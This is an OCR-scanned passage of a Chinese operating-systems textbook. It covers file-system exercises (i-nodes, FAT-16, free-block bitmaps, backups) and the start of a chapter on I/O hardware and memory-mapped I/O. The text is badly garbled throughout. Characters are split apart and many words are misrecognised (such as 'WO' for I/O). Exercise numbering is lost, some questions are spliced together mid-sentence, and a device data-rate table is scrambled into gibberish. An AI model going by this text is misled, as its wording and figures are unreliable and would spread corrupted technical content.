支持 随机 存 取 文件 的 系统 是 否 也 需要 该 操作 ? 

5. 某 一 些 操作 系统 提供 系统 调用 rename 给 文件 重 
命名 ， 同 样 也 可 以 通过 把 文件 复制 到 新 文件 并 
删除 原文 件 而 实现 文件 重 命名 。 请 问 这 两 种 方 
法 有 何不 同 ? 

6. 在 有 些 系统 中 有 可 能 把 部 分 文件 映射 进 内 存 中 。 
如 此 一 来 系统 应 该 施加 什么 限制 ?这 种 部 分 映 
射 如 何 实现 ? 

7. 有 一 个 简单 操作 系统 只 支持 单一 目录 结构 ， 但 
是 允许 该 目录 中 有 任意 多 个 文件 ， 且 带 有 任意 
长 度 的 名 字 。 这 样 可 以 模拟 层次 文件 系统 吗 ? 
如 何 进 行 ? 

8. 在 UNIX 和 Windows 中 ， 通 过 使 用 一 个 特殊 的 系 
统 调用 把 文件 的 “当前 位 置 ”指针 移 到 指定 字 
节 ， 从 而 实现 了 随机 访问 。 请 提出 一 个 不 使 用 
该 系统 调用 完成 随机 存 取 的 替代 方案 。 

9. 考 虑 图 4-8 中 的 目录 树 ， 如 果 当 前 工作 目录 是 
/usrjim， 则 相对 路 径 名 为 ../ast/x 的 文件 的 绝对 
路 径 名 是 什么 ? 

10. 正如 书 中 所 提 到 的 ， 文 件 的 连续 分 配 会 导致 磁 
盘 碎 片 ， 因 为 当 一 个 文件 的 长 度 不 等 于 块 的 整 
数 倍 时 ， 文 件 中 的 最 后 一 个 磁盘 块 中 的 空间 会 
浪费 掉 。 请 问 这 是 内 酚 片 还 是 外 碎片 ?并 将 它 
与 先前 一 章 的 有 关 讨 论 进行 比较 。 

11. 一 种 在 磁盘 上 连续 分 配 并 且 可 以 避免 空洞 的 方 
案 是 ， 每 次 删除 一 个 文件 后 就 紧缩 一 下 磁盘 。 
由 于 所 有 的 文件 都 是 连续 的 ， 复制 文件 时 需要 
寻 道 和 旋转 延迟 以 便 读 取 文 件 , 然后 全 速 传送 。 
在 写 回 文件 时 要 做 同样 的 工作 。 假设 寻 道 时 间 


з 


20. 


为 Sms， 旋 转 延 迟 为 4 ms， 传 送 速率 为 8MB/s， 
而 文件 平均 长 度 是 8 KB ， 把 一 个 文件 读 入 内 
存 并 写 回 到 磁盘 上 的 一 个 新 位 置 需要 多 长 时 
间 ? 运用 这 些 数字 ， 计 算 紧 缩 16GB 磁 盘 的 一 
半 需 要 多 长 时 间 ? 


基于 前 一 个 问题 的 答案 ， 紧 缩 磁盘 有 什么 作用 吗 ? 
. 某 些 数字 消费 设备 需要 存储 数据 ， 比 如 存放 文 


件 等 。 给 出 一 个 现代 设备 的 名 字 ， 该 设备 需要 
文件 存储 ， 并 且 对 文件 运用 连续 分 配 空间 的 方 
法 是 不 错 的 方法 。 


+ MS-DOS 如 何在 文件 中 实现 随机 访问 ? 
-考虑 图 4-13 中 的 i 节 点 。 如 果 它 含有 用 4 个 字 节 


表示 的 10 个 直接 地 址 ， 而 且 所 有 的 磁盘 块 大 小 
是 1024KB， 那 么 文件 最 大 可 能 有 多 大 ? 


- 有 建议 说 ， 把 短文 件 的 数据 存在 i 节点 之 内 会 


提高 效率 并 且 节省 磁盘 空间 。 对 于 图 4-13 中 的 
i 节 点 ， 在 i 节 点 之 内 可 以 存放 多 少 字 节 的 数 
据 ? 


:两 个 计算 机 科学 系 的 学 生 Carolyn 和 Elinor 正 在 


讨论 i Carolyn 认 为 存储 器 容量 越 来 越 大 ， 
价格 越 来 越 便宜 ， 所 以 当 打开 文件 时 ， 直 接 取 
地 点 的 副本 ， 放 到 内 存 i 节点 表 中 ， 建 立 一 个 
新 ;节点 将 更 简单 、 更 快 ， 没 有 必要 搜索 整个 i 
节点 来 判断 它 是 否 已 经 存在 。Elinor 则 不 同意 
这 一 观点 。 他 们 两 个 人 谁 对 ? 


-说 明 硬 连接 优 于 符号 链接 的 一 个 优点 ， 并 说 明 


符号 链接 优 于 硬 连接 的 一 个 优点 。 


- 空闲 磁盘 空间 可 用 空闲 块 玫 或 位 图 来 跟踪 。 假 


设 磁盘 地 址 需要 D 位 ， 一 个 磁盘 有 B 个 块 ， 其 
中 有 F 个 空闲 。 在 什么 条 件 下 ， 空 闲 块 表 采用 
的 空间 少 于 位 图 ? 设 D 为 16 位 ， 请 计算 空闲 磁 
盘 空 间 的 百分比 。 

一 个 空闲 块 位 图 开始 时 和 磁盘 分 区 首次 初始 化 
类 似 ， 比 如 : 1000 0000 0000 0000 (Pikit 
根 目录 使 用 ) ， 系 统 总 是 从 最 小 编号 的 盘 块 开 
始 寻找 空闲 块 ， 所 以 在 有 6 块 的 文件 A 写 入 之 
后 ， 该 位 图 为 1111 1110 0000 0000。 请 说 明 在 
完成 如 下 每 一 个 附加 动作 之 后 位 图 的 状态 ; 

а) 写 入 有 5 块 的 文件 B。 

b) 删除 文件 A。 
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с) 写 信 有 8 块 的 文件 C。 的 一 位 必须 用 于 其 他 用 途 ， 这 样 该 表 就 只 有 
d) 删除 文件 B。 32 768 个 表 项 了 。 如 果 没 有 其 他 修改 ， 在 这 个 
21. 如 果 因 为 系统 崩溃 而 使 存放 空闲 磁盘 块 信息 的 条 件 下 最 大 的 MS-DOS 文 件 有 多 大 ? 


空闲 块 表 或 位 图 完全 丢失 ， 会 发 生 什 么 情况 ? 
有 什么 办 法 从 这 个 灾难 中 恢复 吗 ， 还 是 与 该 磁 
盘 彻 底 再 见 ? 分 别 就 UNIX 和 FAT-16 文 件 系统 
讨论 你 的 答案 。 

.Oliver Owl 在 大 学 计算 中 心 的 工作 是 更 换 用 于 
通宵 数据 备份 的 磁带 ， 在 等 待 每 盘 磁带 完成 的 
同时 ， 他 在 写 一 篇 毕业 论文 ， 证 明 莎士比亚 戏 
剧 是 由 外 星 访客 写成 的 。 由 于 仅 有 一 个 系统 ， 
所 以 只 能 在 正在 做 备份 的 系统 上 运行 文本 编辑 
程序 。 这 样 的 安排 有 什么 问题 吗 ? 

23. 在 教材 中 我 们 详细 讨论 过 增 量 转 储 。 在 
Windows 中 很 容易 说 明 何 时 要 转 储 一 个 文件 ， 
因为 每 个 文件 都 有 一 个 存档 位 。 在 UNIX 中 没 
有 这 个 位 ， 那 么 UNIX 备 份 程序 怎样 知道 哪个 
文件 需要 转 储 ? 

.假设 图 4-25 中 的 文件 21 自 上 次 转 储 之 后 没有 修改 
过 ， 在 什么 情况 下 图 4-26 中 的 四 张 位 图 会 不 同 ? 
. 有 人 建议 每 个 UNIX 文 件 的 第 一 部 分 最 好 和 其 i 节 
点 放 在 同一 个 磁盘 块 中 ， 这 样 做 有 什么 好 处 ? 

‚ 考虑 图 4-27。 对 某 个 特殊 的 块 号 ， 计 数 器 的 值 
在 两 个 表 中 有 没有 可 能 都 是 数值 2? 这 个 问题 
如 何 纠 正 ? 

.文件 系统 的 性 能 与 高 速 缓存 的 命中 率 有 很 大 的 
关系 ( 即 在 高 速 缓存 中 找到 所 需 块 的 概率 ) 。 
从 高 速 缓 在 中 读 取 数据 需要 1ms， 而 从 磁盘 上 
读 取 需要 40ms， 若 命中 率 为 h， 给 出 读 取 数 据 
所 需 平均 时 间 的 计算 公式 。 并 画 出 上 从 0 到 10 
变化 时 的 函数 曲线 。 
.考虑 图 4-21 背 后 的 思想 ， 目 前 磁盘 平均 寻 道 
时 间 为 8ms， 旋 转速 率 为 15 000rpm， 每 道 为 
262 144 字 节 。 对 大 小 各 为 IKB、2KB 和 4KB 
的 磁盘 块 ， 传 送 速 率 各 是 多 少 ? 

. 某 个 文件 系统 使 用 2KB 的 磁盘 块 ， 而 中 间 文 件 
大 小 值 为 1IKB。 如 果 所 有 的 文件 都 是 正好 1KB 
大 ， 那 么 浪费 掉 的 磁盘 空间 的 比例 是 多 少 ? 你 
认为 一 个 真正 的 文件 系统 所 浪费 的 空间 比 这 个 
数值 大 还 是 小 ? 请 说 明理 由 。 

30. MS-DOS 的 FAT-16 表 有 64K 个 表 项 ， 假 设 其 中 
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-MS-DOS 中 的 文件 必须 在 内 存 中 的 FAT-16 表 中 


竞争 空间 。 如 果 某 个 文件 使 用 了 X 个 表 项 ， 其 
他 任何 文件 就 不 能 使 用 这 k 个 表 项 ， 这 样 会 对 
所 有 文件 的 总 长 度 带 来 什么 限制 ? 


.一 个 UNIX 系 统 使 用 1KB 磁 盘 块 和 4 字 节 磁盘 地 


址 。 如 果 每 个 i 节 点 中 有 10 个 直接 表 项 以 及 一 
个 一 次 间接 块 、 一 个 二 次 间接 块 和 一 个 三 次 间 
接 块 ， 那 么 文件 的 最 大 尺寸 是 多 少 ? 

对 于 文件 /usr/ast/courses/os/handout.t， 若 要 调 
入 其 i 节点 需要 多 少 个 磁盘 操作 ? 假设 其 根 目 
录 的 i 节点 在 内 存 中 ， 其 他 路 径 都 不 在 内 存 中 。 
并 假设 所 有 的 目录 都 在 一 个 磁盘 块 中 。 

在 许多 UNIX 系 统 中 ，i 节 点 存放 在 磁盘 的 开始 
之 处 。 一 种 替代 设计 方案 是 ， 在 文件 创建 时 分 
配 i 节 点 ， 并 把 i 节点 存放 在 该 文件 首 个 磁盘 块 
的 开始 之 处 。 请 讨论 这 个 方案 的 优 缺 点 。 
编写 一 个 将 文件 字 节 倒 写 的 程序 ， 这 样 最 后 一 
个 字 节 成 为 第 一 个 字 节 ， 而 第 一 个 字 节 成 为 最 
后 一 个 字 节 。 程 序 必须 适合 任何 长 度 的 文件 ， 
并 保持 适当 的 效率 。 

编写 一 个 程序 ， 访 程序 从 给 定 的 目录 开始 ， 从 
此 点 开始 沿 目录 树 向 下 ， 记 录 所 找到 的 所 有 文 
件 的 大 小 。 在 完成 这 一 切 之 后 ， 该 程序 应 该 打 
印 出 文件 大 小 分 布 的 直方 图 ， 以 该 直方 图 的 区 
间 宽 度 为 参数 (比如 ， 区 间 宽 度 为 1024， 那 么 
大 小 为 0~1023 的 文件 同 在 一 个 区 间 宽 度 ， 大 小 
为 1024~2047 的 文件 同 在 下 一 个 区 间 宽 度 ， 如 
此 类 推 )。 

编写 一 个 程序 ， 扫 描 UNIX 文 件 系统 中 的 所 有 
目录 ， 并 发 现 和 定位 有 两 个 或 更 多 硬 连 接 计 数 
的 i 节点。 对 于 每 个 这 样 的 文件 ， 列 出 指向 该 
文件 的 所 有 文件 的 名 称 。 


- 编写 UNIX 的 新 版 ls 程序 。 这 个 版 本 将 一 个 或 


多 个 目录 名 作为 变量 ， 并 列 出 每 个 目录 中 所 有 
的 文件 ， 一 个 文件 一 行 。 每 个 域 应 该 对 其 类 型 
进行 合理 的 格式 化 。 仅 列 出 第 一 个 磁盘 地 址 
(车 该 地 址 存在 的 话 )。 


第 5 章 输入 /输出 


除了 提供 抽象 (例如 ， 进 程 ( 和 线程 )、 地 址 空间 和 文件 ) 以 外 ， 操 作 系统 还 要 控制 计算 机 的 所 有 
WO (输入 /输出 ) 设备 。 操 作 系 统 必须 向 设备 发 送 命令 ， 捕 捉 中 断 ， 并 处 理 设备 的 各 种 错误 。 它 还 应 该 
在 设备 和 系统 的 其 他 部 分 之 间 提 供 简单 且 易于 使 用 的 接口 。 如 果 有 可 能 ， 这 个 接口 对 于 所 有 设备 都 应 该 
是 相同 的 ， 这 就 是 所 谓 的 设备 无 关 性 。UO 部 分 的 代码 是 整个 操作 系统 的 重要 组 成 部 分 。 操 作 系统 如 何 
管理 MO 是 本 章 的 主题 。 

本 章 的 内 容 是 这 样 组 织 的 : 首先 介绍 IO 硬件 的 基本 原理 ， 然 后 介绍 一 般 的 MO 软件 。UO 软 件 可 以 分 
层 构造 ， 每 层 都 有 明确 的 任务 。 我 们 将 对 这 些 软件 层 进行 研究 ， 看 一 看 它们 做 些 什 么 ， 以 及 如 何在 一 起 
配合 工作 。 

在 此 之 后 将 详细 介绍 几 种 IO 设备 : 磁盘 、 时 钟 、 键 盘 和 显示 器 。 对 于 每 一 种 设备 我 们 都 将 从 硬件 
和 软件 两 方面 加 以 介绍 。 最 后 ， 我 们 还 将 介绍 电源 管理 。 


5.1 WO 硬件 原理 
不 同 的 人 对 于 IO 硬件 的 理解 是 不 同 的 。 对 于 电子 工程 师 而 言 ，UO 硬 件 就 是 芯片 、 导 线 、 电 源 、 电 
机 和 其 他 组 成 硬件 的 物理 部 件 。 对 程序 员 而 言 ， 则 只 注意 IO 硬件 提供 给 软件 的 接口 ， 如 硬件 能 够 接收 
的 命令 、 它 能 够 完成 的 功能 以 及 它 能 够 报告 的 错误 。 本 书 主要 介绍 怎样 对 UO 设 备 编程 ， 而 不 是 如 何 设 
计 、 制 造 和 维护 硬件 ， 因 此 ， 我 们 的 讨论 限于 如 何 对 硬件 编程 ， 而 不 是 其 内 部 的 工作 原理 。 然 而 ， 和 有 
1O 设 备 的 编程 常常 与 其 内 部 操作 密切 相关 。 在 下 面 三 节 中 ， 我 们 将 介绍 与 MO 硬件 编程 有 关 
景 知识 。 这 些 内 容 可 以 看 成 是 对 1.4 节 介绍 性 材料 的 复习 和 扩充 。 
5.1.1 I/O 设 备 
1/O 设 备 大 致 可 以 分 为 两 类 ， 块 设备 (block device) 和 字符 设备 character device)。 块 设备 把 信息 
存储 在 固定 大 小 的 块 中 ， 每 个 块 有 自己 的 地 址 。 通 常 


块 的 大 小 在 512 字 节 至 32 768 字 节 之 间 。 所 有 传输 以 一 2s nax 
个 或 多 个 完整 的 《连续 的 ) HANI. Жин» 88 топ. 
НЕА АЕ ТОНЫНА, ВА CD- ааа Ба 
ROM 和 USB 盘 是 最 常见 的 块 设备 。 HER 100 KB/s 
如 果 仔细 观察 ， 块 可 寻 址 的 设备 与 其 他 设备 之 间 HEFREREEN Se 
并 没有 严格 的 界限 。 磁 盘 是 公认 的 块 可 导 址 的 设备 ， Mo tRMA ©75МВ 
因为 无 论 磁盘 臂 当 前 处 于 什么 位 置 ， 它 总 是 能 够 寻 址 52 信 速 CDROM 1 7.8MB/s 
其 他 柱 面 并 且 等 待 所 需要 的 磁盘 块 旋转 到 磁头 下 面 。 | 快速 以 太 网 12.5 MB/s 
现在 考虑 一 个 用 来 对 磁盘 进行 备份 的 夏 带 机 。 碰 带 包 BNEk 40MBA 
含 按 顺序 排列 的 块 。 如 果 给 出 命令 让 磁带 机 读 第 N 块 ， | 火线 (IEEE 1394) 50MB/s 
它 可 以 首先 向 回 倒 带 ， 然 后 再 前 进 直到 第 N 块 。 该 操作 “| USB 20 SOMS/s 
与 磁盘 的 寻 道 相 类 似 ， 只 是 花费 的 时 间 更 长 。 不 过 ， | SONET 0C-12 网 络 28мВа 
重 写 磁带 中 间 位 置 的 块 有 可 能 做 得 到 ， 也 有 可 能 做 不 ”| SCSI Ultra ?磁盘 MB 
到 。 即 便 有 可 能 把 磁带 当 作 随机 访问 的 块 设备 来 使 用 ， TEAM es 
4+ ЕЁ в SATA 磁 盘 驱 动 器 300MB/s 
也 是 有 些 勉 为 其 难 的 ， 毕 竞 通常 并 不 这 样 使 用 磁带 。 Ош Куа 
另 一 类 1/O 设 备 是 字符 设备 。 字 符 设备 以 字符 为 单 。 ста A 


位 发 送 或 接收 一 个 字符 流 ， 而 不 考虑 任何 块 结构 。 字 
符 设备 是 不 可 寻 址 的 ， 也 没有 任何 寻 道 操作 。 打 印 机 、 图 5-1 某 些 典 型 的 设备 、 网 络 和 总 线 的 数据 率 
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网 络 接口 、 鼠 标 (用 作 指 点 设备 )、 老 鼠 (用 作 心理 学 实验 室 实验 ) ， 以 及 大 多 数 与 磁盘 不 同 的 设备 都 可 
看 作 是 字符 设备 。 

这 种 分 类 方法 并 不 完美 ， 有 些 设备 就 没有 包括 进去 。 例 如 ， 时 钟 既 不 是 块 可 寻 址 的 ， 也 不 产生 或 接 
收 字符 流 。 它 所 做 的 工作 就 是 按照 预先 规定 好 的 时 间 间 隔 产 生 中 断 。 内 存 映射 的 显示 器 也 不 适用 于 此 模 
型 。 但 是 ， 块 设备 和 字符 设备 的 模型 具有 足够 的 一 般 性 ， 可 以 用 作 使 处 理 1/O 设 备 的 某 些 操作 系统 软件 具 
有 设备 无 关 性 的 基础 。 例 如 ， 文 件 系统 只 处 理 抽象 的 块 设备 ， 而 把 与 设备 相关 的 部 分 留 给 较 低层 的 软件 。 

JO 设 备 在 速度 上 覆盖 了 巨大 的 范围 ， 要 使 软件 在 跨越 这 么 多 数量 级 的 数据 率 下 保证 性 能 优良 ， 给 
软件 造成 了 相当 大 的 压力 。 图 5-1 列 出 了 某 些 常见 设备 的 数据 率 ， 这 些 设备 中 大 多 数 随 着 时 间 的 推移 而 
变 得 越 来 越 快 。 


5.1.2 设备 控制 器 

TO 设备 一 般 由 机 械 部 件 和 电子 部 件 两 部 分 组 成 。 通 常 可 以 将 这 两 部 分 分 开 处 理 ， 以 提供 更 加 模块 
化 和 更 加 通用 的 设计 。 电 子 部 件 称 作 设备 控制 器 (device controller) 或 运 配 器 (adapter)。 在 个 人 计算 
机 上 ， 它 经 常 以 主板 上 的 芯片 的 形式 出 现 ， 或 者 以 插入 (PCI) 扩展 槽 中 的 印刷 电路 板 的 形式 出 现 。 机 
械 部 件 则 是 设备 本 身 。 这 一 安排 如 图 1-6 所 示 。 

控制 器 卡 上 通常 有 一 个 连接 器 ， 通 向 设备 本 身 的 电缆 可 以 插入 到 这 个 连接 器 中 。 很 多 控制 器 可 以 操 
作 2 个 、4 个 甚至 8 个 相同 的 设备 。 如 果 控 制 器 和 设备 之 间 采 用 的 是 标准 接口 ， 无 论 是 官方 的 ANSI、IEEE 
或 ISO 标准 还 是 事实 上 的 标准 ， 各 个 公司 都 可 以 制造 各 种 适合 这 个 接口 的 控制 器 或 设备 。 例 如 ， 许 多 公 
司 都 生产 符合 IDE、SATA、SCSI、USB 或 火线 (IEEE 1394) 接口 的 磁盘 驱动 器 。 

控制 器 与 设备 之 间 的 接口 通常 是 一 个 很 低层 次 的 接口 。 例 如 ， 磁 盘 可 以 按 每 个 磁道 10 000 个 扁 区 ， 
每 个 该 区 512 字 节 进 行 格式 化 。 然 而 ， 实 际 从 驱动 器 出 来 的 却 是 一 个 串 行 的 位 (比特 ) 流 ， 它 以 一 个 前 
FA (preamble) 开始 ， 接 着 是 一 个 扇 区 中 的 4096 位 ， 最 后 是 一 个 校 验 和 ， 也 称 为 错误 校正 码 (Error- 
Correcting Code，ECC)。 前 导 符 是 在 对 磁盘 进行 格式 化 时 写 上 去 的 ， 它 包括 柱 面 数 和 扇 区 号 、 遍 区 大 
小 以 及 类 似 的 数据 ， 此 外 还 包含 同步 信息 。 

控制 器 的 任务 是 把 串 行 的 位 流转 换 为 字 节 块 ， 并 进行 必要 的 错误 校正 工作 。 字 节 块 通常 首先 在 控制 
器 内 部 的 一 个 缓冲 区 中 按 位 进行 组 装 ， 然 后 在 对 校 输 和 进行 校 验 并 证 明 字 节 块 没有 错误 后 ， 再 将 它 复制 
到 主 存 中 。 

在 同样 低 的 层次 上 , 监视 器 的 控制 器 也 是 一 个 位 串 行 设备 。 它 从 内 存 中 读 入 包含 待 显示 字符 的 字 节 ， 
并 产生 用 来 调制 CRT 电 子 束 的 信号 ， 以 便 将 结果 写 到 屏幕 上 。 该 控制 器 还 产生 信号 使 CRT 电 子 束 在 完成 
一 行 扫描 后 做 水 平 回 扫 ， 并 且 产生 信号 使 CRT 电 子 束 在 整个 屏幕 扫 撕 结束 后 做 垂直 回 扫 。 如 果 没 有 CRT 
控制 器 ， 那 么 操作 系统 程序 员 只 能 对 显像管 的 模拟 扫描 直接 进行 编程 。 有 了 控制 器 ， 操 作 系统 就 可 以 用 
几 个 参数 (这些 参数 包括 每 行 的 字符 数 或 像素 数 、 每 屏 的 行 数 等 ) 对 其 初始 化 ， 并 让 控制 器 实际 驱动 电 
子 束 。 平 板 TFT 显 示 器 的 工作 原理 与 此 不 同 ， 但 是 也 同样 复杂 。 


5.1.3 内 存 映射 /O 

每 个 控制 器 有 几 个 寄存 器 用 来 与 CPU 进行 通信 。 通 过 写 人 这 些 寄存 器 ， 操 作 系统 可 以 命令 设备 发 送 
数据 、 接 收 数据 、 开 启 或 关闭 ， 或 者 执行 某 些 其 他 操作 。 通 过 读 取 这 些 寄存 器 ， 操 作 系统 可 以 了 解 设 备 
的 状态 ， 是 否 准备 好 接收 一 个 新 的 命令 等 。 

除了 这 些 控制 寄存 器 以 外 ， 许 多 设备 还 有 一 个 操作 系统 可 以 读 写 的 数据 缓冲 区 。 例 如 ， 在 屏幕 上 显 
示 像 素 的 常规 方法 是 使 用 一 个 视频 RAM， 这 一 RAM 基 本 上 只 是 一 个 数据 缓冲 区 ， 可 供 程序 或 操作 系统 
写 人 数据 。 

于 是 ， 问 题 就 出 现 了 : CPU 如 何 与 设备 的 控制 寄存 器 和 数据 缓冲 区 进行 通信 ? 存在 两 个 可 选 的 方法 。 
在 第 一 个 方法 中 ， 每 个 控制 寄存 器 被 分 配 一 个 LO 端口 (IO роп) 号 ， 这 是 一 个 8 位 或 16 位 的 整数 。 所 有 
1/0 端 口 形成 WO 端口 空间 (IO роп space)， 并 且 受 到 保护 使 得 普通 的 用 户 程序 不 能 对 其 进行 访问 (只 有 
操作 系统 可 以 访问 )。 使 用 一 条 特殊 的 IO 指令 ， 例 如 

IN REG, PORT 


CPU 可 以 读 取 控制 寄存 器 PORT 的 内 容 并 将 结果 存 和 人 到 CPU 寄存 器 REG 中 。 类 似 地 ， 使 用 
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OUT PORT, ВЕС 
CPU 可 以 将 REG 的 内 容 写 信 到 控制 寄存 器 中 。 大 多 数 早期 计算 机 ， 包 括 几乎 所 有 大 型 主机 ， 如 IBM 360 
及 其 所 有 后 续 机 型 ， 都 是 以 这 种 方式 工作 的 。 

在 这 一 方案 中 ， 内 存 地 址 空间 和 IO 地 址 空间 是 不 同 的 ， 如 图 5-2a 所 示 。 指令 

IN RO, 4 

МОУ RO, 4 
在 这 一 设计 中 完全 不 同 。 前 者 读 取 1/O 端 口 4 的 内 容 并 将 其 存 人 RO， 而 后 者 则 读 取 内 存 字 4 的 内 容 并 将 其 
存 人 R0。 因 此 ， 这 些 例子 中 的 4 引用 的 是 不 同 且 不 相关 的 地 址 空间 。 


两 个 地 址 空间 一 个 地 址 空间 两 个 地 址 空间 
oOxFFFF .| 
І 内 存 
VO 端口 


a) b) ©) 
图 5-2 a) 单独 的 WO 和 内 存 空间 ，b) 内 存 映射 /O，c) 混合 方案 


第 二 个 方法 是 PDP-11 引 入 的 ， 它 将 所 有 控制 寄存 器 映射 到 内 存 空间 中 ， 如 图 5-2b 所 示 。 每 个 控制 寄 
存 器 被 分 配 惟一 的 一 个 内 存 地 址 ， 并 且 不 会 有 内 存 被 分 配 这 一 地 址 。 这 样 的 系统 称 为 内 存 上 映射 11O 
(memory-mapped IO)。 通 常 分 配给 控制 寄存 器 的 地 址 位 于 地 址 空间 的 顶端 。 图 5-2c 所 示 是 一 种 混合 的 
方案 ， 这 一 方案 具有 内 存 映射 1O 的 数据 缓冲 区 ， 而 控制 寄存 器 则 具有 单独 的 IO 端口 。Pentium 处 理 器 使 
用 的 就 是 这 一 体系 结构 。 在 IBM PC 兼容 机 中 ， 除了 0 到 64K~1! 的 IO 端口 之 外 ，640K 到 1M-1 的 地 址 保留 
给 设备 的 数据 缓冲 区 。 

这 些 方案 是 怎样 工作 的 ? 在 各 种 情形 下 ， 当 CPU 想 要 读 人 一 个 字 的 时 候 ， 不 论 是 从 内 存 中 读 人 还 是 
从 IO 端口 中 读 人 ， 它 都 要 将 需要 的 地 址 放 到 总 线 的 地 址 线 上 ， 然后 在 总 线 的 一 条 控制 线 上 置 起 一 个 
READ 信 号 。 还 要 用 到 第 二 条 信号 线 来 表明 需要 的 是 LO 空间 还 是 内 存 空间 。 如 果 是 内 存 空间 ， 内 存 将 响 
应 请 求 。 如 果 是 1O 空 间 ，1/O 设 备 将 响应 请 求 。 如 果 只 有 内 存 空间 (如 图 5-2b 所 示 的 情形 )， 那 么 每 个 内 
存 模块 和 每 个 1/O 设 备 都 会 将 地 址 线 和 它 所 服务 的 地 址 范围 进行 比较 如 果 地 址 落 在 这 一 范围 之 内 ， 它 
就 会 响应 请 求 。 因 为 绝对 不 会 有 地 址 既 分 配给 内 存 又 分 配给 1/O 设 备 ， 所 以 不 会 存在 歧义 和 冲突 。 

这 两 种 寻 址 控制 器 的 方案 具有 不 同 的 优 和 缺点。 我 们 首先 来 看 一 看 内 存 映 射 IO 的 优点 。 第 一 ， 如 果 
需要 特殊 的 MO 指令 读 写 设备 控制 寄存 器 ， 那么 访问 这 些 寄存 器 需要 使 用 汇编 代码 ， 因 为 在 C 或 C++ 中 不 
存在 执行 IN 或 OUT 指 令 的 方法 。 调用 这 样 的 过 程 增加 了 控制 1JO 的 开销 。 相 反 ， 对 于 内 存 映射 IO ， 设备 
控制 寄存 器 只 是 内 存 中 的 变量 ， 在 C 语 言 中 可 以 和 任何 其 他 变量 一 样 寻 址 。 因 此 ， 对 于 内 存 映射 1/0 ， 
WO 设备 驱动 程序 可 以 完全 用 C 语 言 编写 。 如 果 不 使 用 内 存 映 射 /0， 就 要 用 到 某 些 汇编 代码 。 

第 二 ， 对 于 内 存 映射 IO， 不 需要 特殊 的 保护 机 制 来 阻止 用 户 进程 执行 JO 操 作 。 操作 系统 必须 要 做 
的 全 部 事情 只 是 避免 把 包含 控制 寄存 器 的 那 部 分 地 址 空间 放 人 任何 用 户 的 虚拟 地 址 空间 之 中 。 更 为 有 利 
的 是 ， 如 果 每 个 设备 在 地 址 空间 的 不 同 页 面 上 拥有 自己 的 控制 寄存 器 ， 操作 系统 只 要 简单 地 通过 在 其 页 
表 中 包含 期 望 的 页 面 就 可 以 让 用 户 控制 特定 的 设备 而 不 是 其 他 设备 。 这 样 的 方案 可 以 使 不 同 的 设备 驱动 
程序 放置 在 不 同 的 地 址 空间 中 ， 不 但 可 以 减 小 内 核 的 大 小 ， 而 且 可 以 防止 驱动 程序 之 间 相互 干扰 。 

第 三 ， 对 于 内 存 映 射 1O， 可 以 引用 内 存 的 每 一 条 指令 也 可 以 引用 控制 寄存 器 。 例 如 ， 如 果 存 在 一 
条 指令 TEST 可 以 测试 一 个 内 存 字 是 否 为 0， 那么 它 也 可 以 用 来 测试 一 个 控制 寄存 器 是 否 为 0， 控 制 寄存 
器 为 0 可 以 作为 信号 ， 表 明 设 备 室 闲 并 且 可 以 接收 -一 条 新 的 命令 。 汇编 语言 代码 可 能 是 这 样 的 ; 
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LOOP; TEST PORT_4 1// 检 测 端口 4 是 否 为 0 
BEQ READY 1/ 如 果 为 0， 转 向 READY 
BRANCH LOOP /否则 ， 继 续 测 试 


READY， 
如 果 不 是 内 存 映 射 1O， 那 么 必须 首先 将 控制 寄存 器 读 入 CPU， 然 后 再 测试 ， 这 样 就 需要 两 条 指令 而 不 是 
一 条 。 在 上 面 给 出 的 循环 的 情形 中 ， 就 必须 加 上 第 四 条 指令 ， 这 样 会 稍稍 降低 检测 空闲 设备 的 响应 度 。 

在 计算 机 设计 中 ， 实 际 上 任何 事情 都 要 涉及 权衡 ， 此 处 也 不 例外 。 内 存 映射 10 也 有 缺点 。 首先 ， 
现今 大 多 数 计算 机 都 拥有 某 种 形式 的 内 存 字 高 速 缓 在。 对 -个 设备 控制 寄存 器 进行 高 速 缓存 可 能 是 灾难 
性 的 。 在 存在 高 速 缓存 的 情况 下 考虑 上 面 给 出 的 汇编 代码 循环 。 第 一 次 引用 PORT_4 将 导致 它 被 高 速 组 
存 ， 随 后 的 引用 将 只 从 高 速 缓存 中 取 值 并 且 不 会 再 查询 设备 。 之 后 当 设备 最 终 变 为 就 绪 时 ， 软件 将 没有 
办 法 发 现 这 一 点 。 结 果 ， 循 环 将 永远 进行 下 去 。 

对 内 存 映 射 O， 为 了 避免 这 一 情形 ， 硬件 必须 针对 每 个 页 面具 备 选择 性 禁用 高 速 缓存 的 能 力 。 操 
作 系统 必须 管理 选择 性 高 速 缓存 ， 所 以 这 一 特性 为 硬件 和 操作 系统 两 者 增添 了 额外 的 复杂 性 。 

其 次 ， 如 果 只 存在 一 个 地 址 空间 ， 那么 所 有 的 内 存 模块 和 所 有 的 IO 设备 都 必须 检查 所 有 的 内 存 引 
用 ， 以 便 了 解 由 谁 做 出 响应 。 如 果 计算 机 具有 单一 总 线 ， 如 图 5-3a 所 示 ， 那么 让 每 个 内 存 模块 和 LO 设备 
查看 每 个 地 址 是 简单 易 行 的 。 


CPU 读 写 内 存 
转 到 该 高 带宽 总 线 
CPU CPU 内 存 UO | 
的 内 存 和 IO 该 内 存 端口 允许 
нА е an IO 设备 访问 内 存 


а) b) 
图 5-3 а) 单 总 线 体系 结构 ，b) 双 总 线 内 存 体系 结构 


然而 ， 现 代 个 人 计算 机 的 趋势 是 包含 专用 的 高 速 内 存 总 线 ， 如 图 5-3b 所 示 。 顺 便 提 一 句 ， 在 大 型 机 
中 也 可 以 发 现 这 一 特性 。 装 备 这 一 总 线 是 为 了 优化 内 存 性 能 ， 而 不 是 为 了 慢 速 的 UO 设 备 而 做 的 折 中 。 
Pentium 系 统 甚至 可 以 有 多 种 总 线 (内 存 、PCI、SCSI、USB、ISA)， 如 图 1-12 所 示 。 

在 内 存 映 射 的 机 器 上 具有 单独 的 内 存 总 线 的 麻烦 是 1/O 设 备 没有 办 法 查看 内 存 地 址 ， 因为 内 存 地 址 
旁 路 到 内 存 总 线 上 ， 所 以 没有 办 法 响应 。 此 外 ， 必须 采取 特殊 的 措施 使 内 存 映射 1O 工 作 在 具有 多 总 线 
的 系统 上 。 一 种 可 能 的 方法 是 首先 将 全 部 内 存 引用 发 送 到 内 存 ， 如 果 内 存 响应 失败 ，CPU 将 尝试 其 他 总 
线 。 这 一 设计 是 可 以 工作 的 ， 但 是 需要 额外 的 硬件 复杂 性 。 

